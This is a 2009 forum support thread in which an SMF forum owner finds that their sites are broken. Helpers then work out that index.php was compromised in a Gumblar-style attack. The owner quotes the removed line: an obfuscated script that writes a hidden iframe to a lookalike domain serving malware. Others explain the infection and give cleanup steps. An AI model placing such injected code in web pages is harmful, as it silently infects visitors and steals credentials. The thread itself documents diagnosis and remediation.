News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

What's is this ? Forum Disappeared

Started by alex30, July 05, 2009, 09:36:44 AM

Previous topic - Next topic

alex30

Hello guys, woke up this morning to check my forum and here is what appeared, some unusual error. What's interesting I didn't even do any work on forum yesterday, it was all fine.

http://aquatropicalfish.com/forum/index.php

Please help me to fix it.


Kindred

looks like you installed a mod incorrectly.

We really can't help without some information like smf version, mod that you tried to install and porbably access to your files.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

alex30

Thanks for reply Kindred.

It was all fine after I installed a mod called Activity Bar. My version is 1.1.9. Any ideas what should I do?

mashby

And also, the three sites that link to forums in your signature all have similar errors.
Always be a little kinder than necessary.
- James M. Barrie

alex30

Guys, is that some kind of hack? I'm on hostgator. Help me out please.

Kindred

Quote from: Kindred on July 05, 2009, 09:38:52 AM
looks like you installed a mod incorrectly.

no, it is probably not a hack...    and to fix it, you will have to modify the file and clean up the bad code.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

alex30

But two other sites have the same problem. One of them isn't SMF, but still error appears in Aquarium User Bars.


babjusi

The Activity Bar mod doesn''t affect the index.php file which is the file that throws the error at your forum. Can you post here 10 lines above and below around the error? Or attach here the whole file.

Kindred

in code tags, please post lines 550-610 of your index.php file
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

alex30

Thanks Kindred, it showed that on line 595 I had an error.

I removed that line, it looked like this

<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>

What's this?

vivid

I don't know
but if you upload your forum again it will be better.

without:
Settings.php
Settings_bak.php
style.css

consult smf specialists first about this step

تجميل <a href="http://www.arbsb.com" rel="dofollow">طرائف</a>
<a href="http://www.arbsb.com">مجلة الغرائب عرب سبيس </a>

Norv

Argh! You have been hacked.
An iframe was injected, a little obfuscated to look like that.
Please check out:
Gumblar's 48,000 Compromised Domains Makes the Web a Dangerous Place.
and Security recommendations.
To-do lists are for deferral. The more things you write down the later they're done... until you have 100s of lists of things you don't do.

File a security report | Developers' Blog | Bug Tracker


Also known as Norv on D* | Norv N. on G+ | Norv on Github

Norv

Please note that for all I know (check for "gumblar cn exploit" on the web also if you want), this has nothing to do with SMF. The entry point is rather related to vulnerabilities of browser/flash/adobe reader software, that allows those scripts to download and execute malware on each visitor's computer. Including trojans and keyloggers, that are reported to steal you FTP passwords, thus allowing access to more websites, that will be infected, and thus spread the infection further.

Thus, scan your computers with an up to date antivirus, and change all passwords from a secured machine, are essential steps for it not to happen again.
Also, you should download all the sites and search for this code, as well as for "iframe" (except your iframes, sure.)
To-do lists are for deferral. The more things you write down the later they're done... until you have 100s of lists of things you don't do.

File a security report | Developers' Blog | Bug Tracker


Also known as Norv on D* | Norv N. on G+ | Norv on Github

Kindred

Quote from: Kindred on July 05, 2009, 09:49:47 AM
in code tags, please post lines 550-610 of your index.php file

Why did you ignore the straightforward request?

yes, it appears that you were hacked.... I suspect that there are likely more lines.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

babjusi

Also scan your pc with a antivirus program and change your ftp, forum, cp login info too just to be safe.

I would also clean up all the forum files too if I were you.

alex30

#15
Damn guys, so it was a hack.  :-\

Kindred, I copied that code from 550 all away down, there is no 610 line

'feedsadmin' => array('FeedPoster.php', 'FeedsMain'),
'tags' => array('Tags.php', 'TagsMain'), 'staff' => array('Staff.php', 'Staff'),
'feedsadmin' => array('FeedPoster.php', 'FeedsMain'),
'welcome' => array('WelcomeTopic.php', 'WelcomeTopic'),
'theme' => array('Themes.php', 'ThemesMain'),
'topicredirect' => array('SplitTopics.php', 'TopicRedirects'),
'trackip' => array('Profile.php', 'trackIP'),
'admod' => array('Ads.php', 'Ads'),
'about:mozilla' => array('Karma.php', 'BookOfUnknown'),
'about:unknown' => array('Karma.php', 'BookOfUnknown'),
'unread' => array('Recent.php', 'UnreadTopics'),
'unreadreplies' => array('Recent.php', 'UnreadTopics'),
'viewErrorLog' => array('ManageErrors.php', 'ViewErrorLog'),
'viewmembers' => array('ManageMembers.php', 'ViewMembers'),
'viewprofile' => array('Profile.php', 'ModifyProfile'),
'verificationcode' => array('Register.php', 'VerificationCode'),
'vote' => array('Poll.php', 'Vote'),
'viewquery' => array('ViewQuery.php', 'ViewQuery'),
'who' => array('Who.php', 'Who'),

'login3' => array('login3.php', 'WelcomeBack'),
'logout3' => array('logout3.php', 'GoodBye'),
'.xml' => array('News.php', 'ShowXmlFeed'),
);

// Get the function and file to include - if it's not there, do the board index.
if (!isset($_REQUEST['action']) || !isset($actionArray[$_REQUEST['action']]))
{
// Catch the action with the theme?
if (!empty($settings['catch_action']))
{
require_once($sourcedir . '/Themes.php');
return 'WrapAction';
}

// Fall through to the board index then...
require_once($sourcedir . '/BoardIndex.php');
return 'BoardIndex';
}

// Otherwise, it was set - so let's go to that action.
require_once($sourcedir . '/' . $actionArray[$_REQUEST['action']][0]);
return $actionArray[$_REQUEST['action']][1];
}

?><?php echo ''?>


Norv thanks for an article, I probably caught that kind of virus but still not sure what a hack was that. I keep 4 websites on my account and all 4 got infected, unbelievable!

Going to scan again my pc in order to see if Kapsersky 2009 will find anything suspicious. Thanks all for advices.

Kindred

get rid of this as well
<?php echo ''; ?>
look at the dates of your other files as well....   if the dates don't match your last actual modification, check the file for additional code like that
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

N3RVE

I'm going through old 'unresolved' topics, do you require any further support?
If they are none, please mark this topic as solved to indicate :)

-[n3rve]
Ralph "[n3rve]" Otowo
Former Marketing Co-ordinator, Simple Machines.
ralph [at] simplemachines [dot] org                       
Quote"Somewhere, something incredible is waiting to be known." - Carl Sagan

Advertisement: